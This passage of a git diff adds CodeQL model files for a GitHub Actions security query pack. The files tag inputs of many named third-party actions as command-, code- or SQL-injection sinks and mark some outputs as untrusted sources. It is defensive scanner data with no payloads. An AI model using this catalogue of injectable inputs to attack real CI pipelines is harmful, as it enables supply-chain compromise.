"input.docker_heroku_process_type", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml new file mode 100644 index 00000000000..c530a3af9b3 --- /dev/null +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "pull_request_target", "PR title"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml new file mode 100644 index 00000000000..c632a3a1ff2 --- /dev/null +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/sbom-action", "*", "input.syft-version", "command-injection"] + - ["anchore/sbom-action", "*", "input.format", "command-injection"] + - ["anchore/sbom-action", "*", "input.path", "command-injection"] + - ["anchore/sbom-action", "*", "input.file", "command-injection"] + - ["anchore/sbom-action", "*", "input.image", "command-injection"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml new file mode 100644 index 00000000000..26e5adea505 --- /dev/null +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/scan-action", "*", "input.grype-version", "command-injection"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml new file mode 100644 index 00000000000..2903888a731 --- /dev/null +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.script", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml new file mode 100644 index 00000000000..21dcd22c8b7 --- /dev/null +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["asdf-vm/actions", "*", "input.before_install", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml new file mode 100644 index 00000000000..236eade34a6 --- /dev/null +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection"] + - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml new file mode 100644 index 00000000000..c0e11c8201f --- /dev/null +++ b/ql/lib/ext/azure_powershell.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/powershell", "*", "input.azPSVersion", "command-injection"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml new file mode 100644 index 00000000000..2841f406bda --- /dev/null +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bahmutov/npm-install", "*", "input.install-command", "command-injection"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml new file mode 100644 index 00000000000..aa060de610d --- /dev/null +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["blackducksoftware/github-action", "*", "input.args", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index ee8e6abef09..7d5f699a0e9 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection"] + - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index c58b5a1e1d2..aeda7998631 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml new file mode 100644 index 00000000000..38b18cf6cac --- /dev/null +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection"] + - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index 1c6584eb9d5..2e4291eb480 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cachix/cachix-action", "*", "input.installCommand", "command-injection"] + - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml new file mode 100644 index 00000000000..3be7669275c --- /dev/null +++ b/ql/lib/ext/changesets_action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["changesets/action", "*", "input.publish", "command-injection"] + - ["changesets/action", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml new file mode 100644 index 00000000000..cb0870b4883 --- /dev/null +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection"] + - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml new file mode 100644 index 00000000000..30e59e91d60 --- /dev/null +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index d4e35196c6c..f3b021d226b 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml new file mode 100644 index 00000000000..25df02dacaa --- /dev/null +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml new file mode 100644 index 00000000000..2fda092f20a --- /dev/null +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["cypress-io/github-action", "*", "env.GH_BRANCH", "pull_request_target", "PR branch"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml new file mode 100644 index 00000000000..324171f3c4b --- /dev/null +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection"] + - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection"] diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml new file mode 100644 index 00000000000..cc5c311eea7 --- /dev/null +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml new file mode 100644 index 00000000000..f45aae02158 --- /dev/null +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection"] + - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml new file mode 100644 index 00000000000..7445d673fcf --- /dev/null +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection"] + - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml new file mode 100644 index 00000000000..a8a54dbda29 --- /dev/null +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "*", "Artifact details"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 2aa6013c872..82f491390d2 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] + - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml new file mode 100644 index 00000000000..430a96f6cbe --- /dev/null +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml new file mode 100644 index 00000000000..37bcf2cc781 --- /dev/null +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml new file mode 100644 index 00000000000..77eaf3ae10f --- /dev/null +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["docker/build-push-action", "*", "input.context", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml new file mode 100644 index 00000000000..63cdb2a496b --- /dev/null +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["endbug/latest-tag", "*", "input.ref", "command-injection"] + - ["endbug/latest-tag", "*", "input.tag-name", "command-injection"] + - ["endbug/latest-tag", "*", "input.git-directory", "command-injection"] + - ["endbug/latest-tag", "*", "input.description", "command-injection"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml new file mode 100644 index 00000000000..d0bcbb4da98 --- /dev/null +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expo/expo-github-action", "*", "input.command", "command-injection"] + - ["expo/expo-github-action", "*", "input.packager", "command-injection"] diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml new file mode 100644 index 00000000000..6418e71f22a --- /dev/null +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml new file mode 100644 index 00000000000..86705319e23 --- /dev/null +++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection"] + - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml new file mode 100644 index 00000000000..61fdcd9254a --- /dev/null +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection"] + - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index ab413b6e975..2d142d98099 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] + - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml new file mode 100644 index 00000000000..1727ca60e25 --- /dev/null +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml new file mode 100644 index 00000000000..146f4a17a55 --- /dev/null +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["go-semantic-release/action", "*", "input.bin", "command-injection"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml new file mode 100644 index 00000000000..8c0f7a5ad61 --- /dev/null +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["golangci/golangci-lint-action", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml new file mode 100644 index 00000000000..9c7c03b9f35 --- /dev/null +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection"] + - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml new file mode 100644 index 00000000000..9d9eac38af0 --- /dev/null +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml new file mode 100644 index 00000000000..4c74301d1c3 --- /dev/null +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml new file mode 100644 index 00000000000..6332cbfdad8 --- /dev/null +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml new file mode 100644 index 00000000000..f8b8490c213 --- /dev/null +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ilammy/setup-nasm", "*", "input.version", "command-injection"] + - ["ilammy/setup-nasm", "*", "input.destination", "command-injection"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml new file mode 100644 index 00000000000..64024ef5c72 --- /dev/null +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["imjohnbo/issue-bot", "*", "input.body", "code-injection"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml new file mode 100644 index 00000000000..1771ac2bad0 --- /dev/null +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["iterative/setup-cml", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml new file mode 100644 index 00000000000..e8600c6f7df --- /dev/null +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["iterative/setup-dvc", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml new file mode 100644 index 00000000000..2ab70905db1 --- /dev/null +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml new file mode 100644 index 00000000000..948be24b45c --- /dev/null +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml new file mode 100644 index 00000000000..928c1f918d3 --- /dev/null +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jurplel/install-qt-action", "*", "input.version", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.arch", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.dir", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.extra", "command-injection"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index b237ac313d2..ad95f1f323a 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -4,3 +4,10 @@ extensions: extensible: summaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml new file mode 100644 index 00000000000..b3cb5aa3940 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection"] + - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml new file mode 100644 index 00000000000..a84880cfdf1 --- /dev/null +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml new file mode 100644 index 00000000000..f32484a4f0d --- /dev/null +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml new file mode 100644 index 00000000000..9ce43e68a75 --- /dev/null +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["magefile/mage-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml new file mode 100644 index 00000000000..ac3aaa67def --- /dev/null +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["maierj/fastlane-action", "*", "input.lane", "command-injection"] + - ["maierj/fastlane-action", "*", "input.options", "command-injection"] + - ["maierj/fastlane-action", "*", "input.env", "command-injection"] diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml new file mode 100644 index 00000000000..90fd673c705 --- /dev/null +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 91741f58706..2c9f46b46f4 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -5,3 +5,12 @@ extensions: data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] + - addsTo: + pack: 